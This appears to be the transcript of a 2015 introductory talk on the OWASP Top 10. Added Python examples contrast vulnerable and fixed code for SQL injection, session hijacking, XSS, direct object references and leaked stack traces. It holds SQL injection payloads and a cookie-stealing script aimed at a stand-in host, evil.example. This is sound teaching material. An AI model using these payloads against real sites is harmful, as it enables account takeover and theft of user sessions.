
Introduction to security vulnerabilities

Presentation for VodQA Shots, Hyderabad

Shirish Padalkar

December 12, 2015

Transcript

  1. Vulnerability refers to the inability of a system to withstand the effects of a hostile environment.
  2. In computer security: a vulnerability is a weakness which allows an attacker to reduce a system's information assurance.
  3. Exploit means to take advantage of something for one's own end, especially unethically or unjustifiably.
  4. An exploit is a piece of software that takes advantage of a bug or vulnerability in order to cause unintended behaviour to occur on computer software or hardware.
  6. OWASP
     ▫︎ Open Web Application Security Project
     ▫︎ Not-for-profit charitable organisation
     ▫︎ Focused on improving the security of software
     ▫︎ All materials are available under a FOSS license
     ▫︎ Currently has over 142 active projects
  7. OWASP TOP 10
     ▫︎ List of the 10 most critical web application security risks
     ▫︎ A powerful awareness document
     ▫︎ Reference document for project security analysis
     ▫︎ Published at regular intervals, approximately once in 3 years
     ▫︎ Last published in 2013
  8. OWASP TOP 10, 2013
     1. Injection
     2. Broken authentication and session management
     3. Cross site scripting (XSS)
     4. Insecure direct object references
     5. Security misconfiguration
     6. Sensitive data exposure
     7. Missing function level access control
     8. Cross site request forgery (CSRF)
     9. Using components with known vulnerabilities
     10. Unvalidated redirects and forwards
  10. INJECTION
     ▫︎ SQL Injection
        ▫︎ Most prevalent
        ▫︎ Databases like Oracle, MySQL
     ▫︎ NoSQL Injection
        ▫︎ Comparatively recent
        ▫︎ Databases like MongoDB
     ▫︎ Command Injection
     ▫︎ LDAP Injection
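The SQL injection case from the slide, as an added example that is not part of the deck: the same login query built by string concatenation and with a bound parameter, run against an in-memory SQLite table constructed inline (the users, passwords and payloads are all made up for the example; passwords are stored in clear text only to keep the injection visible, a real system hashes them).

```python
"""SQL injection: string concatenation versus parameter binding."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: two users the attacker does not know the
    # passwords of.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Untrusted input is spliced into the SQL text, so quote characters in
    # the input become part of the query's syntax.
    sql = (
        "SELECT name FROM users WHERE name = '" + username
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Bound parameters travel separately from the query text: the input is
    # compared as data whatever characters it contains.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# Tautology in the password field: closes the string literal and appends an
# always-true clause, turning the WHERE into
#   (name = 'x' AND password = '') OR '1'='1'
PAYLOAD_PASSWORD = "' OR '1'='1"

# Comment in the username field: everything after -- is ignored, so the
# password check disappears from the query.
PAYLOAD_USERNAME = "alice'--"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", login_vulnerable(db, "x", PAYLOAD_PASSWORD))
    print("vulnerable, comment:  ", login_vulnerable(db, PAYLOAD_USERNAME, "wrong"))
    print("safe, tautology:      ", login_safe(db, "x", PAYLOAD_PASSWORD))
    print("safe, comment:        ", login_safe(db, PAYLOAD_USERNAME, "wrong"))
```

The fix is the query shape, not input filtering: the safe version never inspects the input, it just refuses to let it become SQL. The same principle applies to the other injection families on the slide (command, LDAP, NoSQL): keep the untrusted value out of the language being interpreted.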
  11. BROKEN AUTHENTICATION
     ▫︎ Session ID in the URL, where it leaks through the Referer header, browser history and server logs
        ▫︎ PHPSESSID
        ▫︎ JSESSIONID
     ▫︎ Unencrypted passwords in storage or transit
        ▫︎ Login over HTTP
        ▫︎ Email password in plain text (BSNL?)
     ▫︎ Predictable session IDs
     ▫︎ Reusing the same session ID across logins
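The predictable session ID point, as an added example that is not from the deck: a weak issuer derives the ID from the login time, so an attacker who knows roughly when the victim logged in can enumerate the candidates, while a strong issuer draws from the OS CSPRNG. The in-memory session store, the timestamps and the cookie name are constructed for the example.

```python
"""Predictable versus random session identifiers."""
import hashlib
import secrets
import time

SESSIONS: dict = {}  # session id -> username (constructed in-memory store)


def weak_session_id(login_time: int) -> str:
    # Derived from a one-second timestamp: exactly one candidate per second,
    # and hashing adds no entropy the attacker does not already have.
    return hashlib.sha256(str(login_time).encode()).hexdigest()


def strong_session_id() -> str:
    # 32 bytes (256 bits) from the OS CSPRNG, URL-safe base64 encoded.
    return secrets.token_urlsafe(32)


def login_weak(username: str, login_time: int) -> str:
    sid = weak_session_id(login_time)
    SESSIONS[sid] = username
    return sid


def login_strong(username: str) -> str:
    sid = strong_session_id()
    SESSIONS[sid] = username
    return sid


def hijack_by_guessing(start: int, window: int) -> list:
    # Attacker knows the victim logged in within `window` seconds of `start`
    # and simply tries every candidate against the server.
    hits = []
    for t in range(start, start + window):
        candidate = weak_session_id(t)
        if candidate in SESSIONS:
            hits.append((t, SESSIONS[candidate]))
    return hits


def set_cookie_header(sid: str) -> str:
    # Keep the ID out of the URL (so out of Referer headers and logs): send
    # it as a cookie that script cannot read and that only travels over TLS.
    return f"Set-Cookie: sessionid={sid}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    now = int(time.time())
    login_weak("victim", now - 17)
    print("guessed:", hijack_by_guessing(now - 60, 60))
    print(set_cookie_header(login_strong("victim")))
```

A 256-bit random ID cannot be enumerated the way the weak one is, but it still needs the cookie attributes shown: transport over HTTP or a copy in the URL leaks a perfectly random ID just as well as a predictable one.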
  12. CROSS SITE SCRIPTING (XSS)
     ▫︎ Inject client-side script into pages viewed by other users
     ▫︎ Caused by missing HTML or JavaScript escaping of untrusted input
     ▫︎ Can steal cookies, change page location, etc.
     ▫︎ Script executes with the same privileges as the page it is injected into (the page's origin)
  13. XSS TYPES
     ▫︎ Reflected
        ▫︎ Non-persistent
        ▫︎ The most common type
        ▫︎ Typically delivered via email or a neutral web site as a link the victim clicks
        ▫︎ The server displays a page of results for a user without properly escaping the request parameter
        ▫︎ Ex. a search result page that echoes the search term without escaping
  14. XSS TYPES
     ▫︎ Stored
        ▫︎ Persistent
        ▫︎ A more devastating variant
        ▫︎ Permanently displayed on "normal" pages returned to other users
        ▫︎ Example: online message boards / forums, post on a Facebook wall
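Both XSS types from the two slides above, as one added example that is not from the deck: a search page that echoes the query (reflected) and a message board that stores posts (stored), each rendered with and without HTML escaping. The payload, the collector domain and the board contents are constructed for the example.

```python
"""Reflected and stored XSS: rendering untrusted text with and without escaping."""
import html

# Attacker-supplied string. In an unescaped page it runs in every visitor's
# browser with the page's own origin and ships document.cookie to a host the
# attacker controls (evil.example is a made-up name).
PAYLOAD = '<script>new Image().src="https://evil.example/c?"+document.cookie</script>'

POSTS: list = []  # the "message board": (author, body) tuples kept in memory


def search_page_vulnerable(term: str) -> str:
    # Reflected: the request parameter is copied into the response verbatim.
    return f"<h1>Results for {term}</h1><p>No results.</p>"


def search_page_safe(term: str) -> str:
    # html.escape turns <, >, &, " and ' into entities, so the browser shows
    # the text instead of parsing it as markup.
    return f"<h1>Results for {html.escape(term)}</h1><p>No results.</p>"


def post_message(author: str, body: str) -> None:
    # Stored: the server keeps the raw input and replays it to everyone.
    POSTS.append((author, body))


def board_page_vulnerable() -> str:
    return "".join(f"<div><b>{a}</b>: {b}</div>" for a, b in POSTS)


def board_page_safe() -> str:
    # Escape at output time, for the HTML text context the value lands in.
    return "".join(
        f"<div><b>{html.escape(a)}</b>: {html.escape(b)}</div>" for a, b in POSTS
    )


def contains_script(page: str) -> bool:
    # Crude detector used only to show the difference between the renderings.
    return "<script>" in page


if __name__ == "__main__":
    print(search_page_vulnerable(PAYLOAD))
    print(search_page_safe(PAYLOAD))
    post_message("mallory", PAYLOAD)
    print(board_page_vulnerable())
    print(board_page_safe())
```

Storing the raw text and escaping on output is the right split: the same post may later be rendered into an attribute, a JavaScript string or a URL, and each of those contexts needs its own encoding, which html.escape alone does not provide.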
  15. INSECURE DIRECT OBJECT REFERENCES
     ▫︎ The actual name or key of an object is exposed when generating web pages
     ▫︎ The application doesn't verify the user is authorised for the target object
     ▫︎ Attackers can easily manipulate parameter values to access another object
        ▫︎ http://photos.com/download.php?file=personal.jpg
        ▫︎ http://mybank.com/accountInfo?accNumber=123456
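The accountInfo?accNumber=... case from the slide, as an added example that is not from the deck: the handler first as it is typically written (authenticated but with no per-object check) and then with an ownership check. Accounts, balances and session tokens are constructed in memory; the Forbidden exception stands in for a 403 response.

```python
"""Insecure direct object reference: missing versus present authorisation."""

ACCOUNTS = {  # constructed sample data
    "123456": {"owner": "alice", "balance": 1500},
    "123457": {"owner": "bob", "balance": 42},
}
SESSIONS = {"sess-alice": "alice", "sess-bob": "bob"}  # session id -> user


class Forbidden(Exception):
    """Stands in for an HTTP 403."""


def account_info_vulnerable(session_id: str, acc_number: str) -> dict:
    # Authenticates the caller but never asks whether *this* user may read
    # *this* account, so changing the parameter reads anyone's data.
    if session_id not in SESSIONS:
        raise Forbidden("not logged in")
    return ACCOUNTS[acc_number]


def account_info_safe(session_id: str, acc_number: str) -> dict:
    # Authorisation is a per-object decision: fetch the object, then compare
    # its owner with the authenticated user before returning it.
    user = SESSIONS.get(session_id)
    if user is None:
        raise Forbidden("not logged in")
    account = ACCOUNTS.get(acc_number)
    if account is None or account["owner"] != user:
        # Same answer for "does not exist" and "not yours", so the parameter
        # cannot be used to enumerate which account numbers are real.
        raise Forbidden("no such account for this user")
    return account


def accounts_for_user(session_id: str) -> list:
    # Alternative that avoids the raw key entirely: only offer the user the
    # references that already belong to them.
    user = SESSIONS.get(session_id)
    return [n for n, a in ACCOUNTS.items() if a["owner"] == user]


def is_denied(func, session_id: str, acc_number: str) -> bool:
    # Helper so callers can check the outcome without try/except.
    try:
        func(session_id, acc_number)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    print("bob reads alice (vulnerable):", account_info_vulnerable("sess-bob", "123456"))
    print("bob reads alice (safe) denied:", is_denied(account_info_safe, "sess-bob", "123456"))
    print("bob's own accounts:", accounts_for_user("sess-bob"))
```

Making the identifier unguessable (a random UUID instead of 123456) raises the cost of the attack but does not fix it: an identifier that leaks in a URL or a log is still enough to read the object. The ownership check is what removes the vulnerability.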
  16. SECURITY MISCONFIGURATION
     ▫︎ Running the application with debug enabled in production
     ▫︎ Directory listing enabled on the server
     ▫︎ Running outdated software
     ▫︎ Unnecessary services running on the machine
     ▫︎ Not changing default keys and passwords
     ▫︎ Revealing error handling information to the attackers, such as stack traces
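The debug-in-production and stack-trace points from the slide, as an added example that is not from the deck: the same failing request handled with debug on (the traceback goes to the client) and off (the client gets an opaque reference, the traceback goes to the server log). The handler, its failing input and the in-memory log sink are constructed for the example.

```python
"""Error handling that leaks a stack trace versus one that logs it server-side."""
import logging
import secrets
import traceback

CAPTURED: list = []  # stands in for the server-side log file


class _Sink(logging.Handler):
    def emit(self, record: logging.LogRecord) -> None:
        CAPTURED.append(self.format(record))


LOG = logging.getLogger("app")
LOG.addHandler(_Sink())
LOG.setLevel(logging.ERROR)
LOG.propagate = False


def handler(param: str) -> str:
    # Constructed business logic that blows up on a crafted input.
    return str(100 // int(param))


def respond(param: str, debug: bool) -> tuple:
    """Return (status, body) for a request carrying `param`."""
    try:
        return 200, handler(param)
    except Exception:
        tb = traceback.format_exc()
        if debug:
            # Debug left on in production: file paths, the failing line and
            # the exception type go to whoever sent the request.
            return 500, tb
        # Production: correlate client and log through a random reference so
        # support can find the trace without the client ever seeing it.
        ref = secrets.token_hex(8)
        LOG.error("ref=%s\n%s", ref, tb)
        return 500, f"Internal error (reference {ref})"


if __name__ == "__main__":
    print(respond("0", debug=True)[1])
    print(respond("0", debug=False)[1])
    print("server log:", CAPTURED[-1][:60], "...")
```

The reference token is the practical compromise: the operator still gets the full trace, the attacker who triggered the error learns nothing about the code paths or library versions behind it.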